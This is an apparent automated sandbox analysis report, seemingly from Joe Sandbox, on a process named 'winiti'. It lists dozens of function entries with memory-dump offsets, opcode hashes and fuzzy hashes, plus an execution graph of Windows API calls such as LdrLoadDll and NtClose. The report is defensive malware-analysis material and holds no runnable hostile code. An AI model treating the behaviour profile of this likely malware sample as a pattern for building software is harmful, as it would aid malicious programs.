                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414571365.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_17d000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                          • Instruction ID: 0041194c1817ab7fc62789af46a91491cb852afa837990730b6338af1206f0ea
                          • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                          • Instruction Fuzzy Hash: 3F117975944284DFDB12CF14D5C4B15BBB1FF84314F28C6A9D8494B656C33AD84ACBA2
                          Function 002C9348 Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 64b217537e68ee67ec0e79be17f61c4dac6504a263aea28934fc5fb94777af0e
                          • Instruction ID: 52ffbb75180144c572ccb2400cb148ed9cd96aa8f42a04c44fd2b49a104a7dda
                          • Opcode Fuzzy Hash: 64b217537e68ee67ec0e79be17f61c4dac6504a263aea28934fc5fb94777af0e
                          • Instruction Fuzzy Hash: 37118470D29344DFD709CF66C508BAEBBB9AF8A300F01D16AC419A7391D7B44985CF90
                          Function 002C9358 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6bef02cc240e165f0115f2bee2f382dad3284bc4307a05c21ddd7ac943194a7a
                          • Instruction ID: 8ee2510a9534dca83b4806d93f084bbf85b4bc5c6fcd15d4c96e939308c5061e
                          • Opcode Fuzzy Hash: 6bef02cc240e165f0115f2bee2f382dad3284bc4307a05c21ddd7ac943194a7a
                          • Instruction Fuzzy Hash: 2F012C74D29248DBDB08CF66C508BAEBBBAAF8A300F10D16A841967395DBB45585CF80
                          Function 002C4820 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5cd424c076dd11d39119a818bc55fd981224ecf59429ffee6ece13c212cf2bf8
                          • Instruction ID: a48d13c5d61e0ef58a990b7b63be36a672c246c859db9252f6b1b0234ddbda64
                          • Opcode Fuzzy Hash: 5cd424c076dd11d39119a818bc55fd981224ecf59429ffee6ece13c212cf2bf8
                          • Instruction Fuzzy Hash: 8D01693140E3C0AFC742DBB4886048ABFB0AF5321071646EBC455DB2A2DA250E4ACBA2
                          Function 002CF948 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cf3da459963e7d4a62511b49d0745fd2e7b648e4083602f59d2d26c5815e33d9
                          • Instruction ID: e020b3ab79dbfa37cc85a7e7f372bcd1f6644117239679d69097dd342a40cf79
                          • Opcode Fuzzy Hash: cf3da459963e7d4a62511b49d0745fd2e7b648e4083602f59d2d26c5815e33d9
                          • Instruction Fuzzy Hash: 1101E834A14208EFCB44DFA8DA84FADBBF6EB49300F2581A9D40897365D730DE10DB40
                          Function 002C0839 Relevance: .0, Instructions: 34COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fcacfa6f32dced94d1b422e9ed168d0ddbb7c3434e9aa8de9bdc64704eee1756
                          • Instruction ID: b939a1038ecc8ea240def0adcf88b159d5ef4d2c1a44ef368e5ff4956793664c
                          • Opcode Fuzzy Hash: fcacfa6f32dced94d1b422e9ed168d0ddbb7c3434e9aa8de9bdc64704eee1756
                          • Instruction Fuzzy Hash: 3DF0A02191614CCFCB25DBB4D992BBE77B18F82300F1417ADD01AA3191CE354E14DB54
                          Function 002C0918 Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0d8c5d9b7ffd7bcf33f0d0d40dc22af27c04b9aac3bcf0c832073a855368d19
                          • Instruction ID: 5638185403c178b5661af82cb7bff45f96306f003a17df4a3443b31bb93e62f4
                          • Opcode Fuzzy Hash: a0d8c5d9b7ffd7bcf33f0d0d40dc22af27c04b9aac3bcf0c832073a855368d19
                          • Instruction Fuzzy Hash: BDF0303090A285DFC715DBB4E991BA9BBB15F86300F5511EED048975A2C7344E50C765
                          Function 002C0848 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 757fbdbf053eee57587f9e4e875d5e3798b1f5bb865d613e1b360f1aa8e0ed66
                          • Instruction ID: bb6bca2373f56bcea240fb74373966cbf081ad323d6b36ec9541db5ebcae2a47
                          • Opcode Fuzzy Hash: 757fbdbf053eee57587f9e4e875d5e3798b1f5bb865d613e1b360f1aa8e0ed66
                          • Instruction Fuzzy Hash: 8CE0DF3091210CDBCB28EFB4C952A2E73B9DF82300F002AACD40AA3241CF305E20D694
                          Function 002C0484 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 94d26ce54a5ba7b9aca8fa0614bb983f30fe84fa588c3f978985126f73373985
                          • Instruction ID: b73e0ebebce5d71b1a9f298d0f880225b48d2f16bd36ad26d0d39c7006f42ecc
                          • Opcode Fuzzy Hash: 94d26ce54a5ba7b9aca8fa0614bb983f30fe84fa588c3f978985126f73373985
                          • Instruction Fuzzy Hash: C0E04F7095220CEBD768EF69E591F6EB7B5EF89300F9051ADE00C63262DB305E10DA54
                          Function 002C4DA0 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2c8c40db8a7705825e5d32942bf76bb53ec1de90100eb016985adec3b008118e
                          • Instruction ID: 5b390537c3046cde77c5fe839e3f645ec8402e6d0b5d9db86ddd782cf7d9ecbe
                          • Opcode Fuzzy Hash: 2c8c40db8a7705825e5d32942bf76bb53ec1de90100eb016985adec3b008118e
                          • Instruction Fuzzy Hash: 15E04F363005149B83557B69A81852E7AEFEBD9721B2880A9F906C3358DE34DC4287E2
                          Function 002C3AF0 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b6bb5e126c9edd9031c5069f59fde1836c5a973a250067bf67414c590cd5d895
                          • Instruction ID: ef3e5418507278c7df4232a7e787c3b857907d1a23dc2f2fc741ef3d649323c5
                          • Opcode Fuzzy Hash: b6bb5e126c9edd9031c5069f59fde1836c5a973a250067bf67414c590cd5d895
                          • Instruction Fuzzy Hash: BCE04F7684E348AFC742CFB899509DABFF9AF5620071141E6D40AD7632EB311E048B62
                          Function 002C95BC Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a5bd64cb5083332e421936f43c41dc32678fb1c8bd38c6c894135670a9b5277f
                          • Instruction ID: d98eafc1ad728c2335fe6d10f9f6742d858f8aad674c73d46f713ba94f9f0bf2
                          • Opcode Fuzzy Hash: a5bd64cb5083332e421936f43c41dc32678fb1c8bd38c6c894135670a9b5277f
                          • Instruction Fuzzy Hash: C2E0EC3486E344DFCB05CB64C00CAACBBBCAF0B300B116289D4199B262C7B89899DE44
                          Function 002C95DA Relevance: .0, Instructions: 17COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                          • Instruction ID: 0f81131f3a5edfd3a2ac878da6780fa0e2186bc3f598c381a6d17c2575cfadc6
                          • Opcode Fuzzy Hash: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                          • Instruction Fuzzy Hash: B9D0177887E604CBCB05CB65C04CEA8B76CBB0E300B60AA89881A5B202CAB49494DE40
                          Function 002C47EF Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 824230574ed67d758a351fdc6f24ebc6e918f7d3d56273f65fd4657c44a02327
                          • Instruction ID: 1c628964a6fcafe02f50ca4738beed3124c4d7e69d93096ad4286ad29387ae99
                          • Opcode Fuzzy Hash: 824230574ed67d758a351fdc6f24ebc6e918f7d3d56273f65fd4657c44a02327
                          • Instruction Fuzzy Hash: 04E0127054B7C15FC3429774C850488BFB0AFA721071A5797C4A0CA293DA665887C751
                          Function 002C3B00 Relevance: .0, Instructions: 14COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 17fc5d80314e1e14b3297bb2c11e3be72f11da251f961265f5fe15d84f4b66dc
                          • Instruction ID: baa45a279cb70abe541b8bf12b20abc71871315dd511ec46632f77ae5c3e8278
                          • Opcode Fuzzy Hash: 17fc5d80314e1e14b3297bb2c11e3be72f11da251f961265f5fe15d84f4b66dc
                          • Instruction Fuzzy Hash: 74D0C97190520CEF8B40DFA8DA44A9EBBFDEB45200B1041E6D90ED3220EF315E109B92
                          Function 002CD220 Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ecf16c3b69ffd7055d86a2d18e75f9ae825b7daa7f06679355aeacac92caa6e1
                          • Instruction ID: c8a23c4352e083b5e12af25c6a0e362007a9b1450afd4891956e86399526fb8e
                          • Opcode Fuzzy Hash: ecf16c3b69ffd7055d86a2d18e75f9ae825b7daa7f06679355aeacac92caa6e1
                          • Instruction Fuzzy Hash: 00C04C300016049BD2266B98ED1C729BB5CA741706F440129D64D514714B745452C6A6
                          Function 002C8681 Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 203986543bad92e75211e31bcf9f67118bddf28580307f1aad18a342578e2cd9
                          • Instruction ID: a49376e86deefedee71622120cfd4f5902070da3f280279ebd853bccbcd02405
                          • Opcode Fuzzy Hash: 203986543bad92e75211e31bcf9f67118bddf28580307f1aad18a342578e2cd9
                          • Instruction Fuzzy Hash: 31C002A250E2C49FC7039B7089608407F306E6B11531E84DFD4959B1A7DB1A6A25D796
                          Function 002C8F8F Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f9551024ad3065a3ddc6b052437955e0d7f5bf7b53709cddb4a6df9d7ca3e047
                          • Instruction ID: d77be8c75583d25366eb4cd47db11641a6e1921b4bad7236317f972f2b9abb69
                          • Opcode Fuzzy Hash: f9551024ad3065a3ddc6b052437955e0d7f5bf7b53709cddb4a6df9d7ca3e047
                          • Instruction Fuzzy Hash: FFC0123093D244CFC7218B60C814AAC7B75BB0A340B70820E9026A3612CB601810EF01
                          Function 002CB3A0 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 66051a8435a70d58aa983645fecbdd3e6aec4b4df0f1291bd332fdb23b5a08ce
                          • Instruction ID: 292f189096cc8bf756c7303419482970472282b7ba07ca00bd06d53be666163e
                          • Opcode Fuzzy Hash: 66051a8435a70d58aa983645fecbdd3e6aec4b4df0f1291bd332fdb23b5a08ce
                          • Instruction Fuzzy Hash: F2C09BD15496C05FD3019664C8757407F607F61206F0541DDD455471D3D7056616DB51
                          Function 002C8F1E Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e734822a254406c8f4f9e1046bd18d0c2b3865e04a71568064425073bae4a499
                          • Instruction ID: b235cfbf38cc6cc30b609b2d6009170632c34c0b61016b90f6c9fd24ebf5161b
                          • Opcode Fuzzy Hash: e734822a254406c8f4f9e1046bd18d0c2b3865e04a71568064425073bae4a499
                          • Instruction Fuzzy Hash: 02C04C34D28104DFC730CB60D554AAC7775BB0D341F70421D902653512C7605451DF40

                          Non-executed Functions

                          Function 002C3B38 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.414622587.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p
                          • API String ID: 0-481844870
                          • Opcode ID: b1811697c167f2ea83215538a4e51365ead75c9f2739fa6f13825a328edb3549
                          • Instruction ID: 238c36a0987a86504e7dd8cb273dde7ebe892957be05bcfc50825f2a2beece54
                          • Opcode Fuzzy Hash: b1811697c167f2ea83215538a4e51365ead75c9f2739fa6f13825a328edb3549
                          • Instruction Fuzzy Hash: D8515071A106048FD709EF3AE84565EBBF3AFC8300F58C479E0089B269EF349985CB95
                          Function 00BD19B1 Relevance: .3, Instructions: 317COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e149c01b1a70538cf76f453553c2f841948801fb6026ffdb776f8363afb8ea91
                          • Instruction ID: 9d45df007691854cdbc85cbfa0987395d1c30581a3a2613d929148f7ffa4bdaf
                          • Opcode Fuzzy Hash: e149c01b1a70538cf76f453553c2f841948801fb6026ffdb776f8363afb8ea91
                          • Instruction Fuzzy Hash: 16E1F674E002599BCB14DFA9C5809ADFBF2BF89301F2485AAE815AB356E7319D41CF60
                          Function 00BD2220 Relevance: .3, Instructions: 316COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c5fa0710bb59989eb68580299e9f26baca55282b41f52539fc82250ad26b9a39
                          • Instruction ID: 33b4bd3843bde78b0226563bba37c88f61e69582689d14bff6d7612d8a95b1b2
                          • Opcode Fuzzy Hash: c5fa0710bb59989eb68580299e9f26baca55282b41f52539fc82250ad26b9a39
                          • Instruction Fuzzy Hash: 91E1E874E002998FCB14DFA9C5909ADFBF2BF89305F2481AAE815A7356D7319D42CF60
                          Function 00BD1DE8 Relevance: .3, Instructions: 315COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d65084b0daf23094e178ff6916127de4f5f0cb79d785359a7c0f5e0deb90f120
                          • Instruction ID: 22ad4de116161e0e7023d55937a346d0fd2b04c8978837c6ceb82d81e035a09d
                          • Opcode Fuzzy Hash: d65084b0daf23094e178ff6916127de4f5f0cb79d785359a7c0f5e0deb90f120
                          • Instruction Fuzzy Hash: BAE1D774E001998FCB14DFA9C5809ADFBF2BF89305F2485AAE815AB356D7319D41CF60
                          Function 00BD2718 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e8229ca0ba60eb58260211a28119c43989db0e99d5b7840f28abb8a9ce3dc2d8
                          • Instruction ID: 21e0a73bf01d92110912b394b4d93de3132cbd4bfb8133c77ca9e0de1683f71c
                          • Opcode Fuzzy Hash: e8229ca0ba60eb58260211a28119c43989db0e99d5b7840f28abb8a9ce3dc2d8
                          • Instruction Fuzzy Hash: F5E1E774E102998BCB14DFA9C5809AEFBF2FF88305F2481AAE815A7356D7319D41CF60
                          Function 00BD2B50 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ca3083d3bc293c23db8812328a3e79d8d34d77c0dcdd9fd6a21d3bf943168ba8
                          • Instruction ID: 0e2aef56d1d34904eeb1551d568a20280dd0509fd16d9a16cfc2aa302fb48997
                          • Opcode Fuzzy Hash: ca3083d3bc293c23db8812328a3e79d8d34d77c0dcdd9fd6a21d3bf943168ba8
                          • Instruction Fuzzy Hash: 9FE1E674E002998BCB14DFA9C5809ADFBF2FF89301F2485AAE815A7356D731AD41CF60
                          Function 00BD2709 Relevance: .1, Instructions: 129COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3f53e7ba7a73cec944749587429d5311853f14bed0619fe0f20936c8d0ea92ac
                          • Instruction ID: 7bc6f0bb9ab881dcfb9b5160cf69092cd23cd908311a62094bea7f96db3c554e
                          • Opcode Fuzzy Hash: 3f53e7ba7a73cec944749587429d5311853f14bed0619fe0f20936c8d0ea92ac
                          • Instruction Fuzzy Hash: 1F5109B5E042598BDB14CFA9C9805AEFBF2FF89301F2481AAD418A7356D7319D41CFA1
                          Function 00BD2B40 Relevance: .1, Instructions: 129COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4e3687608a102c3f2077402b4f43e05b0feef2c46f284e6ef0c3e60f50aed55
                          • Instruction ID: 2e23c312034e673adf9b7dfbc9dcdb3996b9d84c20470494315c08e59f050f65
                          • Opcode Fuzzy Hash: f4e3687608a102c3f2077402b4f43e05b0feef2c46f284e6ef0c3e60f50aed55
                          • Instruction Fuzzy Hash: FD510674E102598BCB14CFA9C9845AEFBF2FF89301F2481AAD418A7356D7319D42CFA0
                          Function 00BD19C0 Relevance: .1, Instructions: 127COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8ec3b070b48185b0ee3f5e8fdfb06c332b3bf9134af21fc779e1f3affe8b8d7c
                          • Instruction ID: 0f250e1e948b0ae79be14f5873711281a73f518b52381b08f8fdd128176337f1
                          • Opcode Fuzzy Hash: 8ec3b070b48185b0ee3f5e8fdfb06c332b3bf9134af21fc779e1f3affe8b8d7c
                          • Instruction Fuzzy Hash: FC511874E002599BDB14CFA9C9805AEFBF2FF89300F2485AAD418A7356E7319D41CFA0
                          Function 00BD2230 Relevance: .1, Instructions: 127COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.414900997.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_bd0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f5a5b2ed41c69816516709a4190a96865348e24023694b87ace562dce19f59a5
                          • Instruction ID: ba867647cac975507f4ea7a4ba2ee39ff20128dc8dde98797998557b1bb7fcb0
                          • Opcode Fuzzy Hash: f5a5b2ed41c69816516709a4190a96865348e24023694b87ace562dce19f59a5
                          • Instruction Fuzzy Hash: 5F510874E002598FDB14CFA9C9845AEFBF2BF89311F2481AAD418A7356D7359942CFA0

                          Execution Graph

                          Execution Coverage:0.9%
                          Dynamic/Decrypted Code Coverage:4.1%
                          Signature Coverage:7.2%
                          Total number of Nodes:97
                          Total number of Limit Nodes:8
                          execution_graph 78408 42f0c3 78409 42f0d3 78408->78409 78410 42f0d9 78408->78410 78413 42e0a3 78410->78413 78412 42f0ff 78416 42c213 78413->78416 78415 42e0be 78415->78412 78417 42c22d 78416->78417 78418 42c23e RtlAllocateHeap 78417->78418 78418->78415 78419 424803 78420 42481f 78419->78420 78421 424847 78420->78421 78422 42485b 78420->78422 78423 42bee3 NtClose 78421->78423 78429 42bee3 78422->78429 78425 424850 78423->78425 78426 424864 78432 42e0e3 RtlAllocateHeap 78426->78432 78428 42486f 78430 42befd 78429->78430 78431 42bf0e NtClose 78430->78431 78431->78426 78432->78428 78505 42b4d3 78506 42b4f0 78505->78506 78509 8dfdc0 LdrInitializeThunk 78506->78509 78507 42b518 78509->78507 78510 42f1f3 78511 42f163 78510->78511 78512 42e0a3 RtlAllocateHeap 78511->78512 78513 42f1c0 78511->78513 78514 42f19d 78512->78514 78515 42dfc3 RtlFreeHeap 78514->78515 78515->78513 78521 424b93 78522 424bac 78521->78522 78523 424bf7 78522->78523 78526 424c37 78522->78526 78528 424c3c 78522->78528 78524 42dfc3 RtlFreeHeap 78523->78524 78525 424c07 78524->78525 78527 42dfc3 RtlFreeHeap 78526->78527 78527->78528 78529 413ab3 78530 413ad3 78529->78530 78532 413b3c 78530->78532 78534 41b213 RtlFreeHeap LdrInitializeThunk 78530->78534 78533 413b32 78534->78533 78433 401a64 78434 401a80 78433->78434 78434->78434 78437 42f593 78434->78437 78440 42db73 78437->78440 78441 42db99 78440->78441 78450 407313 78441->78450 78443 42dbaf 78449 401b69 78443->78449 78453 41af43 78443->78453 78445 42dbce 78446 42dbe3 78445->78446 78447 42c2b3 ExitProcess 78445->78447 78464 42c2b3 78446->78464 78447->78446 78452 407320 78450->78452 78467 4166d3 78450->78467 78452->78443 78454 41af6f 78453->78454 78489 41ae33 78454->78489 78457 41afb4 78460 41afd0 78457->78460 78462 42bee3 NtClose 78457->78462 78458 41af9c 78459 41afa7 78458->78459 78461 42bee3 NtClose 78458->78461 78459->78445 78460->78445 78461->78459 78463 41afc6 78462->78463 78463->78445 78465 42c2cd 78464->78465 78466 42c2de ExitProcess 78465->78466 78466->78449 78468 4166ed 78467->78468 78470 416706 78468->78470 78471 42c953 78468->78471 78470->78452 78473 42c96d 78471->78473 78472 42c99c 78472->78470 78473->78472 78478 42b523 78473->78478 78479 42b53d 78478->78479 78485 8dfae8 LdrInitializeThunk 78479->78485 78480 42b569 78482 42dfc3 78480->78482 78486 42c263 78482->78486 78484 42ca15 78484->78470 78485->78480 78487 42c280 78486->78487 78488 42c291 RtlFreeHeap 78487->78488 78488->78484 78490 41ae4d 78489->78490 78494 41af29 78489->78494 78495 42b5c3 78490->78495 78493 42bee3 NtClose 78493->78494 78494->78457 78494->78458 78496 42b5e0 78495->78496 78499 8e07ac LdrInitializeThunk 78496->78499 78497 41af1d 78497->78493 78499->78497 78500 417aa5 78501 417aa2 78500->78501 78502 417a58 78500->78502 78503 417a63 LdrLoadDll 78502->78503 78504 417a7a 78502->78504 78503->78504 78535 8df9f0 LdrInitializeThunk

                          Executed Functions

                          Function 00417A03 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 266 417a03-417a2c call 42ecc3 269 417a32-417a40 call 42f203 266->269 270 417a2e-417a31 266->270 273 417a50-417a61 call 42d663 269->273 274 417a42-417a4d call 42f4a3 269->274 279 417a63-417a77 LdrLoadDll 273->279 280 417a7a-417a7d 273->280 274->273 279->280
                          APIs
